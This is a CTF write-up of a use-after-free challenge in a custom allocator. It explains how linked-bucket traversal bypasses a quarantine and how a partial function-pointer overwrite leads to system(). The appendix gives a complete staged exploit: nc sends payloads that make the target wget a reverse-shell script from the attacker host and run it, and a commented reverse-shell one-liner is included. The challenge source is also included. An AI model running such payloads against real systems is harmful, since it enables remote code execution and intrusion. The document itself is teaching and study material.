Exploiting a Quarantine UAF Mitigation on a Custom Allocator Challenge
Last updated: Apr 16, 2025
# Introduction
In the previous blog post we walked through the Reverse Engineering challenge written for the NoHat24 security conference. In this post, we cover the binary exploitation challenge, which revolves around a custom userland allocator developed specifically for this challenge. Writing our own allocator, loosely inspired by the kernel SLUB allocator, was a really fun and educational experience. We implemented a Use-After-Free quarantine mitigation to prevent its exploitation: was it good enough?
# Introducing the Custom Allocator
The custom allocator source code was available through an HTTP web interface and can now be downloaded directly from here. The two files hmalloc.h and hmalloc.c contain the whole implementation of the custom allocator, which replaces the standard glibc malloc. The following structs describe the allocator design:

```c
struct list_head{
    struct list_head* next;
    struct list_head* prev;
};

struct bucket{
    struct list_head buckets;
    /* Offset of the available alloc inside the bucket */
    uint16_t offset;
    /* How many allocs are freed */
    uint8_t freelist_count;
    uint8_t freelist[MAX_ALLOCS];
    void* allocs[];
};

/* Single allocations just contain the size of the alloc as metadata */
struct alloc{
    uint16_t size;
    void* user[];
} __attribute__((packed));
```
The target allocator, inspired by the kernel SLUB allocator, is built around a simple “bucket” concept. Each allocation size (from 16 to 1024) has its own memory region retrieved from mmap (through __init_bucket) and is considered a SMALL_BUCKET, while larger buckets (LARGE_BUCKETS) are not handled by the allocator. A Bucket Master Control (the bucket_master_ctrl global variable inside hmalloc.c) stores the buckets’ addresses at an offset that can be used to retrieve the requested bucket for the needed size. The offset is the allocation size minus the size of a pointer: for example, the bucket address for 32-byte allocations is at offset 24 (32-8).
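The lookup is just a pointer read at that offset, as implemented in __get_bucket (full source in the appendix):

```c
struct bucket* __get_bucket(size_t alloc_size){
    /* e.g. alloc_size = 32 -> off = 24 */
    off_t off = alloc_size - sizeof(void*);
    return *(void**)((void*) bucket_master_ctrl + off);
}
```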
When malloc is called for the first time with a given size, which is always rounded up to the nearest power of two starting from 32 (i.e. 32, 64, 128, 256, 512, 1024), the bucket is allocated through __init_bucket and referred to as the current_bucket. The current bucket is the bucket we initially try to allocate from, and once allocated it can be retrieved using __get_bucket. Each allocation, named alloc in the source code, contains just the size of the allocation as metadata, and alloc->user is the pointer returned by malloc. When an alloc is allocated from a bucket, bucket->offset is incremented by one and used for the next allocations to return subsequent memory addresses (it is always multiplied by the allocation size). The offset does not just provide the means to return new allocations, it also marks and identifies freed allocations inside the bucket. A freelist is implemented to return freed memory first (to avoid fragmentation) with a LIFO mechanism. bucket->freelist is an array of freed allocs (identified by their offsets) that is indexed with bucket->freelist_count, which is incremented every time an alloc is freed and decremented when a freed allocation is returned back to the user. This “dynamic” array makes handling the freelist pretty easy and is the first path through which __malloc returns an allocation.
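In __malloc, this LIFO pop is the first path tried (slightly condensed from the source in the appendix):

```c
/* 1. Verify if we have freed allocs inside the current_bucket */
if(current_bucket->freelist_count && __is_freelist_available()){
    offset = current_bucket->freelist[current_bucket->freelist_count - 1];
    alloc  = (void*) current_bucket->allocs + (offset * alloc_size);
    current_bucket->freelist_count--;
    return alloc->user;
}
```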
When the maximum number of allocations ((PAGE_SZ - sizeof(struct bucket)) / alloc_size) is reached for a bucket, a new bucket is created (through newly mmap'ed memory) and linked through the list_head next and prev members:
```c
old_current_bucket->buckets.next = (struct list_head*) &current_bucket->buckets.next;
current_bucket->buckets.prev = (struct list_head*) &old_current_bucket->buckets.next;
```
The linked list allows multiple buckets to be chained together for each allocation size. When the current bucket is full (i.e. it is not possible to reuse freed allocs nor return new ones), the previous and next buckets are checked (traversing the linked list backwards and forwards) and an allocation is returned if one of them has a freed alloc on its freelist. Also, if the found bucket contains at least a specific number of freed elements (FREELIST_REPLACE_BUCKET_THRESHOLD), it replaces the current bucket in the bucket_master_ctrl (through __update_master_ctrl_bucket).
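The backward traversal in __malloc (condensed from the full source in the appendix) pops an alloc from a linked bucket's freelist and, if the threshold is met, promotes that bucket to current:

```c
/* 3. If we have linked buckets, verify them as well (backwards first) */
linked_bucket = (struct bucket*) current_bucket->buckets.prev;
while(linked_bucket != NULL){
    if(linked_bucket->freelist_count == 0){
        linked_bucket = (struct bucket*) linked_bucket->buckets.prev;
        continue;
    }
    /* If here we have a freed alloc */
    offset = linked_bucket->freelist[linked_bucket->freelist_count - 1];
    alloc  = (void*) linked_bucket->allocs + (offset * alloc_size);
    linked_bucket->freelist_count--;
    /* Replace the current bucket if it still has enough freed allocs */
    if(linked_bucket->freelist_count >= FREELIST_REPLACE_BUCKET_THRESHOLD)
        __update_master_ctrl_bucket(alloc_size, linked_bucket);
    return alloc->user;
}
```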
When free is called with a pointer, the alloc struct is retrieved through ptr - sizeof(struct alloc) and the bucket is obtained by masking the pointer with ~0xfff, i.e. clearing the lower 12 bits (memory returned from mmap is always page aligned). To calculate the alloc's offset inside the bucket, the distance between the allocation address and bucket->allocs is divided by the allocation size retrieved from the alloc metadata (so the first alloc is 0, the second 1, the third 2 and so on). The bucket->freelist[] array is updated with the calculated offset and bucket->freelist_count is incremented by one.
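Condensed from free in hmalloc.c (full source in the appendix):

```c
/* Recover the alloc and its bucket, then push the offset onto the freelist */
current_alloc  = ptr - sizeof(struct alloc);
current_bucket = __get_bucket_from_alloc(current_alloc);   /* & SMALL_BUCKET_MASK */
offset = ((void*) current_alloc - (void*) current_bucket->allocs) / current_alloc->size;
current_bucket->freelist[current_bucket->freelist_count] = offset;
current_bucket->freelist_count++;
freelist_quarantine_time = time(NULL);
```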
# Freelist quarantine mitigation
Before leaving the free function, a global freelist_quarantine_time variable is set to the current time. When checking the freelist of the current bucket, the function __is_freelist_available verifies its availability. A freed alloc can be returned only if ten seconds (FREELIST_QUARANTINE_WAIT) have passed since the last free:
```c
bool __is_freelist_available(){
#ifdef FREELIST_QUARANTINE
    if((time(NULL) - freelist_quarantine_time) < FREELIST_QUARANTINE_WAIT){
        DEBUG_PRINT("[DEBUG] Freelist is quarantined\n");
        return false;
    }
    return true;
#endif
    return true;
}
```
This mitigation aims to prevent the immediate reuse of freed allocations (Use-After-Free vulnerabilities).
# Freelist quarantine Weakness
However, the mitigation is not bulletproof, and that is the intended objective of the CTF. The freelist timer is only checked when searching for freed allocs inside the current bucket, not when traversing linked buckets. Suppose the following scenario:
- Two buckets (bucket_1 and bucket_2) are fully allocated (i.e. no available or freed allocations). bucket_2 is the “current” one (the one registered in the Bucket Master Control).
- An alloc is freed from bucket_1.
- When malloc is called (with the same size of the two buckets), the freelist of bucket_2 is not available while, through traversing, the just-freed alloc from bucket_1 is immediately available.

The described scenario can be used to exploit an immediate UaF condition.
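As a sanity check, a minimal, hypothetical test harness (not part of the challenge, and assuming it is compiled and linked together with hmalloc.c) would look like this:

```c
/* Hypothetical harness, for illustration only: fill two 64-byte buckets,
 * free an alloc from the first (non-current) one and observe that the very
 * next malloc returns it immediately, without waiting out the quarantine. */
#include <stdlib.h>
#include <assert.h>

#define ALLOCS_PER_BUCKET 55   /* (4096 - sizeof(struct bucket)) / 64 */

int main(void){
    void* ptrs[ALLOCS_PER_BUCKET * 2];

    /* bucket_1 and bucket_2 end up fully allocated; bucket_2 is the current one */
    for(int i = 0; i < ALLOCS_PER_BUCKET * 2; i++)
        ptrs[i] = malloc(48);           /* 48 + 2 rounds up to the 64-byte bucket */

    free(ptrs[0]);                      /* the freed alloc lives in bucket_1 */

    /* No ten-second wait: traversal hands the dangling chunk straight back */
    assert(malloc(48) == ptrs[0]);
    return 0;
}
```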
# Main binary logic
The main binary logic (main.c) is pretty simple. It reads 4096 bytes from stdin and parses them line by line, searching for commands to execute inside a switch statement. Each line must begin with a valid command (CMD_CREATE, CMD_ADD, CMD_DELETE, CMD_SELL, CMD_DROP) and follow a command-specific format. For example, the CMD_CREATE command allocates a struct object (using malloc), and malloc is also used to allocate object->name and object->description, whose sizes are computed with strlen and validated. At the end of the command, the three function pointers (sell, add and drop) are set to function_sell, function_add and function_drop respectively, just like a primitive OOP language.
This is the mentioned struct:
```c
struct object{
    int id;
    int price;
    char* name;
    char* description;
    int stock;
    int earnings;
    void (*sell) (struct object* this);
    void (*add) (struct object* this);
    void (*drop) (struct object* this);
};
```
Also, when a new object is allocated, an array of object pointers (objs) is updated to store all of them. The array is later used for the vtable functions (sell, add and drop) and to delete an object based on its specified id.
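For reference, here is a minimal sketch (the helper function is purely illustrative) of how a single CMD_CREATE line is laid out, following the parsing code in main.c (see the appendix):

```c
/* Illustration only: builds one CMD_CREATE line the way main.c parses it:
 * 1 command byte, 2-byte id, 2-byte price, NUL-terminated name,
 * NUL-terminated description, then the mandatory '\n'. */
#include <string.h>
#include <stdint.h>
#include <stddef.h>

static size_t build_create(char* out, uint16_t id, uint16_t price,
                           const char* name, const char* desc){
    size_t i = 0;
    out[i++] = 0x10;                          /* CMD_CREATE        */
    memcpy(out + i, &id, 2);    i += 2;       /* obj->id           */
    memcpy(out + i, &price, 2); i += 2;       /* obj->price        */
    memcpy(out + i, name, strlen(name) + 1);  i += strlen(name) + 1;
    memcpy(out + i, desc, strlen(desc) + 1);  i += strlen(desc) + 1;
    out[i++] = '\n';                          /* each line ends with a newline */
    return i;
}
```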
# The vulnerability (UAF)
The vulnerability is pretty straightforward: when an object is freed (through CMD_DELETE), the objs array is not updated and the dangling pointer can still be accessed, without further validation, by another command (Use-After-Free) or by CMD_DELETE itself (Double Free).
However, there is one big obstacle: the freelist quarantine mitigation does not permit an immediate Use-After-Free. In order to exploit the UAF, it is necessary to recreate a heap layout similar to the one described in “Freelist quarantine Weakness”, where we can trigger the UAF against an allocation from a non-current bucket.
# Exploitation
# Objective
Let’s first declare an objective. As simple as it sounds, we want to compromise the binary application (which is exposed through socat) and read the flag. We have a UAF primitive on a struct object that contains interesting members: dynamic strings (which we can use to overlap the freed allocation) and three function pointers. The function pointers, which behave like a vtable, look like a really juicy target since they live on the heap (inside the object structure) and can be triggered from multiple commands. The name and description members are really interesting allocations that can be used to replace the freed alloc thanks to their flexible, user-controlled size.
Also, since we have a single interaction with the program (we pass everything through stdin once), we cannot use read primitives or similar to leak ASLR. We can go for a brute force or a partial overwrite in order not to mess too much with randomized pointers.
# Heap shaping to bypass the quarantine
With a clearer path in mind, let’s start creating the UAF state with Python, step by step:
```python
objs = []
content = ""

# Objective:
# Allocate 2 64 bytes buckets and make them full
# 520 = sizeof(struct bucket)
# 4096 - 520 = 3576 / 64 = 55
for n in range(0, 55 * 2):
    obj_id = pack("<h", int(n)).decode()
    objs.append(obj_id)
    # print_stderr("[*] Creating object {}".format(n))
    # Create
    content += "\x10" # CMD_CREATE
    content += obj_id
    content += "\x16\x00"
    content += "\x41" * 20 + "\x00"
    content += "\x42" * 4 + "\x00"
    content += "\n"
```
We fill two buckets (bucket_1 and bucket_2) with 110 allocations of struct object. A struct object takes 58 bytes once the alloc metadata is included, hence it goes into the bucket for 64-byte allocations (we can call it bucket_64). bucket_64 can contain up to 55 allocations, since the PAGE_SZ memory region (4096) minus the struct bucket metadata (520), divided by the allocation size (64), is 55.
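A quick way to double-check those numbers (assuming the snippet is compiled together with hmalloc.c from the appendix):

```c
#include <stdio.h>
#include "hmalloc.h"

int main(void){
    /* 16 (list_head) + 2 (offset) + 1 (freelist_count) + 500 (freelist),
     * padded to 8 bytes for the allocs[] flexible array member -> 520 */
    printf("sizeof(struct bucket) = %zu\n", sizeof(struct bucket));
    /* (4096 - 520) / 64 = 55 */
    printf("max 64-byte allocs    = %zu\n", __bucket_max_allocations(64));
    return 0;
}
```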
```python
# DELETE (Free)
content += "\x12"
content += objs[0]
content += "\n"

# DELETE (Free)
content += "\x12"
content += objs[1]
content += "\n"
```
We then free the first two allocations from bucket_1. We free two of them because the last freed one (due to the LIFO freelist order) will be replaced, via the CMD_CREATE command, with another struct object (malloc(sizeof(struct object))) and initialized with zeros, removing any chance of a partial overwrite to bypass ASLR. The first freed allocation, instead, can be replaced with arbitrary user input thanks to the strlen-based dynamic allocation. Because of strlen, however, we are bound to its behavior (e.g. it is not possible to have NULL bytes inside our payload).
# Partial Overwrite
We can create, through CMD_CREATE, a fake object inside the name or description string allocation, by making its size fall inside bucket_64, in order to trigger the UAF against it.
We can perform a partial overwrite through the memcpy function (on the freed object) by replacing one or two bytes, so as not to touch the ASLR-randomized bits at all. execute_system is an interesting function that accepts a char pointer and passes it as a parameter to system, allowing the execution of arbitrary shell commands. It is a really interesting primitive for a crucial reason: for the function pointers, the rdi register (i.e. the first parameter) is the object itself (this). This means that, if we can redirect execution to execute_system, we fully control the first parameter, which is the command to be executed! To see what we need to partially overwrite, we can run objdump against the binary:
```
$ objdump -D -M intel main | grep '<execute_system\|function_drop'
0000000000001270 <execute_system>:
00000000000012c0 <function_drop>:
```
The function_drop address is 0x12c0, while execute_system is at 0x1270. Since the two differ only in the last byte, if we overwrite the last byte of the object->drop pointer with 0x70 and later execute the CMD_DROP command, we trigger system with input under our control (the last allocated object itself):
```python
# ID & price
fake_obj = "AA;$({});#".format(cmd)
#fake_obj += "\x41" * 0x2c
fake_obj += "\x41" * ( 0x30 - len(fake_obj) )
# CMD_DROP function pointer => @execute_system
# @execute_system
fake_obj += "\x70" + "\x00"

# Create => alloc bucket1->freelist[1]
content += "\x10"
content += "\x37\x13" # sh
content += "\x16\x00"
# Name: system payload
content += "BB\x00"
# Description: alloc on bucket1->freelist[0] (obj[0])
content += fake_obj
content += "\n"

# CMD_DROP => Trigger arbitrary function call
content += "\x14"
content += "\x41\x41"
content += "\n"
```
Since the struct object allocation is too small for a direct reverse shell command, the vulnerability is exploited three times: first to download a complete reverse shell script through wget, then to chmod it, and finally to execute it.
# Alternative Solution (Double Free)
An alternative, originally not the intended solution, is to exploit the Double Free vulnerability instead. It is possible to have the same alloc returned twice by inserting (through exploitation) the same freelist offset into bucket->freelist, achieving the same objective. If you solved the challenge that way at the NoHat CTF, or at any other time, we are really curious about it: let us know!
# Conclusion
The final exploit can be found here. We hope you have enjoyed this two-article series of write-ups for the NoHat24 CTF event.
# Appendix
# Exploit Code
exploit.sh
```bash
#!/bin/bash

if [ "$#" -ne 4 ]; then
    echo "$0 <RHOST> <RPORT> <LHOST> <LPORT>"
    exit
fi

RHOST=$1
RPORT=$2
LHOST=$3
LPORT=$4

echo "[*] Generating payload for the three stages"
python3 generate_input_files.py $LHOST

echo "[*] Modifying script reverse shell to $LHOST:$LPORT"
sed -e "s/LHOST/$LHOST/g" -e "s/LPORT/$LPORT/g" rev.sh > e
python3 generate_input_files.py $LHOST

echo "[*] Starting web server"
python3 -m http.server&
sleep 1

echo "[*] Sending stage 1 to $RHOST $RPORT - wget http://$LHOST:8000/e"
nc -v $RHOST $RPORT < input_file_1
echo "[+] Done"
sleep 1

echo "[*] Sending stage 2 to $RHOST $RPORT"
nc -v $RHOST $RPORT < input_file_2
echo "[+] Done"
sleep 1

echo "[*] Sending stage 3 to $RHOST $RPORT.. The uploaded script should be executed"
nc -v $RHOST $RPORT < input_file_3
echo "[+] Done"
sleep 1

# kill web server
pkill python3
```
generate_input_files.py:
```python
from struct import pack
import sys

def print_stderr(msg):
    sys.stderr.write(msg + "\n")

def exploit(cmd, filename):
    objs = []
    content = ""

    # Objective:
    # Allocate 2 64 bytes buckets and make them full
    # 520 = sizeof(struct bucket)
    # 4096 - 520 = 3576 / 64 = 55
    for n in range(0, 55 * 2):
        obj_id = pack("<h", int(n)).decode()
        objs.append(obj_id)
        # print_stderr("[*] Creating object {}".format(n))
        # Create
        content += "\x10"
        content += obj_id
        content += "\x16\x00"
        content += "\x41" * 20 + "\x00"
        content += "\x42" * 4 + "\x00"
        content += "\n"

    # Status
    # Bucket 1: Fully allocated
    # Bucket 2: Fully allocated (current)
    # Free two allocations from bucket 1
    # Since bucket 2 is current and the traversing doesn't involve the
    # quarantine mitigation, we can bypass it

    # DELETE (Free)
    content += "\x12"
    content += objs[0]
    content += "\n"

    # DELETE (Free)
    content += "\x12"
    content += objs[1]
    content += "\n"

    # ID & price
    fake_obj = "AA;$({});#".format(cmd)
    #fake_obj += "\x41" * 0x2c
    fake_obj += "\x41" * ( 0x30 - len(fake_obj) )
    # CMD_DROP function pointer
    # @execute_system
    fake_obj += "\x70" + "\x00"

    # Create => alloc bucket1->freelist[1]
    content += "\x10"
    content += "\x37\x13" # sh
    content += "\x16\x00"
    # Name: system payload
    # content += ";mknod /tmp/mypipe p ; /bin/bash 0< /tmp/mypipe | nc 127.0.0.1 4445 1> /tmp/mypipe\x00"
    content += "BB\x00"
    # Description: alloc on bucket1->freelist[0] (obj[0])
    content += fake_obj
    content += "\n"

    # DROP => Trigger arbitrary function call
    content += "\x14"
    content += "\x41\x41"
    content += "\n"

    with open(filename, "w") as f:
        f.write(content)
    print_stderr("[+] {} generated".format(filename))

if __name__ == "__main__":
    exploit("wget http://{}:8000/e -O /tmp/e".format(sys.argv[1]), "input_file_1")
    exploit("chmod +x /tmp/e", "input_file_2")
    exploit("/tmp/e", "input_file_3")
```
# Challenge Source Code
main.c
```c
#include <stdio.h>
#include "hmalloc.h"
#define CMD_CREATE 0x10
#define CMD_ADD 0x11
#define CMD_DELETE 0x12
#define CMD_SELL 0x13
#define CMD_DROP 0x14
#define MAX_OBJS 1000
#define BUF_SZ 4096
#define MAX_STRING_SZ 1024
int total_earnings = 0;
int total_stocks = 0;
int total_objs = 0;
struct object* objs[MAX_OBJS];
struct object{
int id;
int price;
char* name;
char* description;
int stock;
int earnings;
void (*sell) (struct object* this);
void (*add) (struct object* this);
void (*drop) (struct object* this);
};
void function_sell(struct object* this){
printf("CMD_SELL\n");
if(this->stock <= 0)
return;
this->stock--;
this->earnings = this->earnings + this->price;
}
void function_add(struct object* this){
printf("CMD_ADD\n");
this->stock++;
}
void execute_system(const char* cmd){
system(cmd);
}
void notify_end(){
const char* cmd = "touch /tmp/end";
execute_system(cmd);
}
void function_drop(struct object* this){
printf("CMD_DROP\n");
this->stock--;
}
void show_object(struct object* obj){
printf("\tid: 0x%x\n", obj->id);
printf("\tPrice: %d\n", obj->price);
printf("\tName: %s\n", obj->name);
printf("\tDescription: %s\n", obj->description);
printf("\tStock: %d\n", obj->stock);
printf("\tEarnings: %d\n", obj->earnings);
}
struct object* get_object(short int obj_id){
// Search for the product id
int j = 0;
while(j < total_objs){
if((short int) objs[j]->id == obj_id)
return objs[j];
j++;
}
return NULL;
}
int main(){
char raw_input[BUF_SZ];
int n_read;
size_t n;
struct object* obj;
int obj_id;
memset(raw_input, 0x0, BUF_SZ);
/* Parse file from input */
n_read = read(0, raw_input, BUF_SZ);
int idx = 0;
while(idx < n_read){
int command = raw_input[idx];
idx++;
switch(command){
case CMD_CREATE:
printf("CMD_CREATE\n");
obj = malloc(sizeof(struct object));
memset(obj, 0x0, sizeof(struct object));
/* Object ID*/
memcpy(&obj->id, raw_input + idx, 2);
idx = idx + 2;
/* Object Price*/
memcpy(&obj->price, raw_input + idx, 2);
idx = idx + 2;
/* Object name */
n = strlen((char*) raw_input + idx);
if(n == 0 || n > MAX_STRING_SZ || (idx + n) > n_read)
return -1;
obj->name = malloc(n);
memcpy(obj->name, raw_input + idx, n);
idx = idx + n + 1;
/* Object description */
n = strlen((char*) raw_input + idx);
if(n == 0 || n > MAX_STRING_SZ || (idx + n) > n_read)
return -1;
obj->description = malloc(n);
memcpy(obj->description, raw_input + idx, n);
idx = idx + n + 1;
obj->sell = function_sell;
obj->add = function_add;
obj->drop = function_drop;
if(total_objs > MAX_OBJS)
return -1;
objs[total_objs] = obj;
total_objs++;
break;
case CMD_DROP:
case CMD_ADD:
case CMD_SELL:
memcpy(&obj_id, raw_input + idx, 2);
idx = idx + 2;
obj = get_object(obj_id);
if(obj == NULL)
break;
if(command == CMD_ADD)
obj->add(obj);
else if(command == CMD_DROP)
obj->drop(obj);
else if(command == CMD_SELL)
obj->sell(obj);
break;
case CMD_DELETE:
printf("CMD_DELETE\n");
memcpy(&obj_id, raw_input + idx, 2);
idx = idx + 2;
obj = get_object(obj_id);
if(obj == NULL)
break;
free(obj->name);
free(obj->description);
free(obj);
break;
default:
fprintf(stdout, "Command 0x%x not found\n", command);
return -1;
break;
}
if(raw_input[idx] != 0x0a){
fprintf(stderr, "Missing newline");
exit(EXIT_FAILURE);
}
idx++;
}
notify_end();
return 0;
}
```
hmalloc.h
```c
#ifndef HMALLOC_H
#define HMALLOC_H
#include <stdint.h>
#include <sys/types.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/mman.h>
#include <time.h>
#include <unistd.h>
//#define DEBUG
#ifdef DEBUG
#define DEBUG_PRINT(fmt, args...) fprintf(stderr, fmt, ## args)
#else
#define DEBUG_PRINT(fmt, args...)
#endif
#define PAGE_SZ 4096
#define MAX_ALLOCS 500
/*
* Small buckets: 16, 32, 64, 128, 256, 512, 1024
* Large buckets (not YET supported) : >= 2048
*/
#define SMALL_BUCKET_PAGES 1
#define SMALL_BUCKET_MIN_SZ 16
#define SMALL_BUCKET_MAX_SZ 1024
#define SMALL_BUCKET_MASK ~0xFFF // 1 PAGE
#define LARGE_BUCKET_MIN_SZ 2048
#define LARGE_BUCKET_PAGES 4
//#define LARGE_BUCKET_MASK 0xFFFFFFFFC000 // 4 PAGES
//#define LARGE_BUCKET_MASK TODO
#define FREELIST_REPLACE_BUCKET_THRESHOLD 3
/* 10 seconds */
#define FREELIST_QUARANTINE
#define FREELIST_QUARANTINE_WAIT 10
#define BUCKET_MAX_SZ 2048
typedef uint64_t bool;
#define true 1
#define false 0
struct list_head{
struct list_head* next;
struct list_head* prev;
};
struct bucket{
struct list_head buckets;
/* Offset of the available alloc inside the bucket */
uint16_t offset;
/* How many allocs are freed */
uint8_t freelist_count;
uint8_t freelist[MAX_ALLOCS];
void* allocs[];
};
/* Single allocations just contain the size of the alloc as metadata */
struct alloc{
uint16_t size;
void* user[];
} __attribute__((packed));
void* malloc(size_t size);
void free(void* ptr);
bool __hmalloc_init();
void* __malloc(size_t size);
size_t __round_up_size(size_t sz);
size_t __bucket_max_allocations(size_t alloc_size);
struct bucket* __get_bucket(size_t alloc_size);
struct bucket* __get_bucket_from_alloc(struct alloc* target_alloc);
static inline void __update_master_ctrl_bucket(size_t alloc_size, struct bucket* b);
void* __fastpath_new_bucket_alloc(struct bucket* bucket, size_t alloc_size);
bool __is_freelist_available();
void __dump_bucket(struct bucket* b);
void __dump_alloc(struct alloc* a);
#endif // HMALLOC_H
```
hmalloc.c
```c
#include "hmalloc.h"
/*
* TODO: Single buckets are never unmmaped
*/
void** bucket_master_ctrl = NULL;
time_t freelist_quarantine_time = 0;
size_t __round_up_size(size_t size) {
int power = 32;
while(power < size)
power*=2;
return power;
}
void __dump_bucket(struct bucket* b){
DEBUG_PRINT("[DEBUG]\tstruct bucket {\n");
DEBUG_PRINT("\t\tnext: %p\n", b->buckets.next);
DEBUG_PRINT("\t\tprev: %p\n", b->buckets.prev);
DEBUG_PRINT("\t\toffset: %d\n", b->offset);
DEBUG_PRINT("\t\tfreelist_count: %d\n", b->freelist_count);
for(int i=0; i < b->freelist_count; i++)
DEBUG_PRINT("\t\tfreelist[%d]: %d\n", i, b->freelist[i]);
DEBUG_PRINT("\t\tallocs: %p\n", b->allocs);
DEBUG_PRINT("\t}\n[/DEBUG]\n");
}
void __dump_alloc(struct alloc* a){
DEBUG_PRINT("[DEBUG]\tstruct alloc {\n");
DEBUG_PRINT("\t\tsize: %d\n", a->size);
DEBUG_PRINT("\t\tuser: %p\n", a->user);
DEBUG_PRINT("\t}\n[/DEBUG]\n");
}
bool __hmalloc_init(){
bucket_master_ctrl = mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
if(bucket_master_ctrl == MAP_FAILED){
perror("mmap");
return false;
}
//DEBUG_PRINT("[DEBUG] HMALLOC initialized with bucket_master_ctrl = %p\n", bucket_master_ctrl);
memset(bucket_master_ctrl, 0x0, PAGE_SZ);
return true;
}
struct bucket* __init_bucket(size_t size){
struct bucket* bucket;
DEBUG_PRINT("Initializing small bucket with %d pages\n", SMALL_BUCKET_PAGES);
bucket = mmap(NULL, PAGE_SZ * SMALL_BUCKET_PAGES, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
memset(bucket, 0x0, PAGE_SZ * SMALL_BUCKET_PAGES);
return bucket;
}
size_t __bucket_max_allocations(size_t alloc_size){
return ((PAGE_SZ * SMALL_BUCKET_PAGES) - sizeof(struct bucket)) / alloc_size;
}
struct bucket* __get_bucket(size_t alloc_size){
off_t off = alloc_size - sizeof(void*);
return *(void**)((void*) bucket_master_ctrl + off);
}
struct bucket* __get_bucket_from_alloc(struct alloc* target_alloc){
return (struct bucket*) ((uint64_t) target_alloc & SMALL_BUCKET_MASK);
}
static inline void __update_master_ctrl_bucket(size_t alloc_size, struct bucket* bck){
off_t off = alloc_size - sizeof(void*);
*(void**) ((void*) bucket_master_ctrl + off) = bck;
}
void* __fastpath_new_bucket_alloc(struct bucket* b, size_t alloc_size){
// return the pointer to the first allocation of a newly allocated bucket
struct alloc* alloc = (struct alloc*) b->allocs;
alloc->size = alloc_size;
b->offset++;
return alloc->user;
}
bool __is_freelist_available(){
#ifdef FREELIST_QUARANTINE
if((time(NULL) - freelist_quarantine_time) < FREELIST_QUARANTINE_WAIT){
return false;
}
return true;
#endif
return true;
}
void* malloc(size_t size){
void* alloc;
if(!bucket_master_ctrl){
if(!__hmalloc_init())
return NULL;
}
alloc = __malloc(size);
DEBUG_PRINT("malloc(%zu) = %p\n", size, alloc);
return alloc;
}
void* __malloc(size_t input_size){
size_t alloc_size;
off_t bucket_offset;
off_t offset;
struct bucket* current_bucket;
struct bucket* old_current_bucket;
struct bucket* linked_bucket;
struct alloc* alloc;
uint8_t freelist_count = 0;
size_t bucket_max_allocs = 0;
/* Size validation */
if(input_size == 0)
return NULL;
DEBUG_PRINT("\n+++++++++ MALLOC +++++++++\n");
alloc_size = __round_up_size(input_size + sizeof(struct alloc));
if(alloc_size > SMALL_BUCKET_MAX_SZ){
/* TODO: Not implemented */
return NULL;
}
/* Retrieve, or initialize, the appropriate bucket based on alloc_size */
current_bucket = __get_bucket(alloc_size);
/* If the bucket is not initialized, do it */
if(current_bucket == NULL){
current_bucket = __init_bucket(alloc_size);
if(current_bucket == NULL){
perror("__init_bucket: mmap");
return NULL;
}
DEBUG_PRINT("[DEBUG] Bucket %zu initialized: %p\n", alloc_size, current_bucket);
// Store the bucket inside the Bucket Master Control
__update_master_ctrl_bucket(alloc_size, current_bucket);
}
DEBUG_PRINT("[DEBUG] current_bucket (%zu) = %p\n", alloc_size, current_bucket);
__dump_bucket(current_bucket);
/* 1. Verify if we have freed allocs inside the current_bucket */
freelist_count = current_bucket->freelist_count;
if(freelist_count && __is_freelist_available()){
offset = current_bucket->freelist[(current_bucket->freelist_count - 1)];
alloc = (void*) current_bucket->allocs + ( offset * alloc_size);
current_bucket->freelist_count--;
DEBUG_PRINT("[DEBUG] Alloc retrieved from the freelist with offset %ld: %p\n", offset, alloc);
return alloc->user;
}
/* 2. Verify if we can alloc from the current bucket */
bucket_max_allocs = __bucket_max_allocations(alloc_size);
bucket_offset = current_bucket->offset;
if(bucket_offset != bucket_max_allocs){
// We still have allocs to return!
if(bucket_offset > bucket_max_allocs){
DEBUG_PRINT("!! bucket_offset should never exceeds its maximum allocations!\n");
return NULL;
}
alloc = (struct alloc*) ((void*) current_bucket->allocs + (bucket_offset * alloc_size));
alloc->size = alloc_size;
current_bucket->offset++;
__dump_alloc(alloc);
return alloc->user;
}
// From now on, bucket_offset == bucket_max_allocs (e.g. bucket is full)
/* 3. If we have linked buckets, verify them as well */
// Traverse backwards first
if(current_bucket->buckets.prev){
linked_bucket = (struct bucket*) current_bucket->buckets.prev;
while(linked_bucket != NULL){
// Traverse
DEBUG_PRINT("[DEBUG] linked bucket %p\n", linked_bucket);
__dump_bucket(linked_bucket);
if(linked_bucket->freelist_count == 0){
linked_bucket = (struct bucket*) linked_bucket->buckets.prev;
continue;
}
// If here we have a freed alloc
offset = linked_bucket->freelist[(linked_bucket->freelist_count - 1)];
alloc = (void*) linked_bucket->allocs + ( offset * alloc_size);
linked_bucket->freelist_count--;
// Verify if this bucket has enough freed allocs to replace the current bucket
if(linked_bucket->freelist_count >= FREELIST_REPLACE_BUCKET_THRESHOLD){
__update_master_ctrl_bucket(alloc_size, linked_bucket);
}
// Return the alloation directly from here
DEBUG_PRINT("[DEBUG] Returing alloc %p from bucket %p with traversing\n", alloc, linked_bucket);
return alloc->user;
}
}
// Traverse forward
if(current_bucket->buckets.next){
linked_bucket = (struct bucket*) current_bucket->buckets.next;
while(linked_bucket != NULL){
// Traverse
DEBUG_PRINT("[DEBUG] linked bucket %p\n", linked_bucket);
__dump_bucket(linked_bucket);
if(linked_bucket->freelist_count == 0){
linked_bucket = (struct bucket*) linked_bucket->buckets.next;
continue;
}
// If here we have a freed alloc
offset = linked_bucket->freelist[(linked_bucket->freelist_count - 1)];
alloc = (void*) linked_bucket->allocs + ( offset * alloc_size);
linked_bucket->freelist_count--;
// Verify if this bucket has enough freed allocs to replace the current bucket
if(linked_bucket->freelist_count >= FREELIST_REPLACE_BUCKET_THRESHOLD){
DEBUG_PRINT("[DEBUG] Master bucket updated with %p\n", linked_bucket);
__update_master_ctrl_bucket(alloc_size, linked_bucket);
}
// Return the alloation directly from here
DEBUG_PRINT("[DEBUG] Returing alloc %p from bucket %p with traversing\n", alloc, linked_bucket);
return alloc->user;
}
}
/* 4. If everything fails, allocate a new bucket */
old_current_bucket = current_bucket;
current_bucket = __init_bucket(alloc_size);
if(current_bucket == NULL){
perror("__init_bucket: mmap");
return NULL;
}
DEBUG_PRINT("[DEBUG] New bucket %zu initialized: %p\n", alloc_size, current_bucket);
// update list_heads
old_current_bucket->buckets.next = (struct list_head*) &current_bucket->buckets.next;
current_bucket->buckets.prev = (struct list_head*) &old_current_bucket->buckets.next;
